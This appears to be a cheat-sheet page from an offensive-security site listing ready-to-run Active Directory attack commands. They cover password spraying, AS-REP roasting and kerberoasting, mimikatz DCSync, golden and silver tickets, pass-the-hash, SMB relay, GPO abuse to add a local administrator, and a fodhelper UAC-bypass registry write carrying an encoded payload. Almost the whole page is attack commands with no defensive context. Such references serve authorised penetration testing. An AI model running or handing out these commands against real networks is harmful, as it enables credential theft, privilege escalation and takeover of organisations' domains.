>_ shadow.red
root@shadow:~/active-directory$ ls
[04]

Active Directory

Alert! To view more content, click the description below a terminal command.

crackmapexec smb target -u users.txt -p 'Pass!' --continue-on-success
AD Attacks linux
python3 username-generate.py -u names.txt -o generated_users.txt
AD Enumeration linux
impacket-GetNPUsers domain/ -dc-ip target -usersfile users.txt
AD Attacks linux windows
lsadump::dcsync /user:domain\user
AD Attacks linux windows
kerberos::golden /user:user /domain:domain /sid:SID /krbtgt:hash /ptt
AD Attacks windows
. .\HostRecon.ps1; Invoke-HostRecon
AD Enumeration windows
impacket-GetUserSPNs -request domain/user:pass -dc-ip target
AD Attacks linux windows
sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:powershell
AD Attacks windows
.\Rubeus.exe kerberoast /outfile:hashes.txt
AD Attacks windows
msfconsole use exploit/windows/smb/smb_relay
AD Attacks linux
kerberos::golden /sid:SID /domain:domain /target:host /service:svc /rc4:hash /user:user /ptt
AD Attacks windows
.\StandIn.exe --gpo --filter "Default Domain Policy" --localadmin user
AD Attacks windows
" reg, fodhelper ad-attacks">
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "<encoded payload>"
AD Attacks windows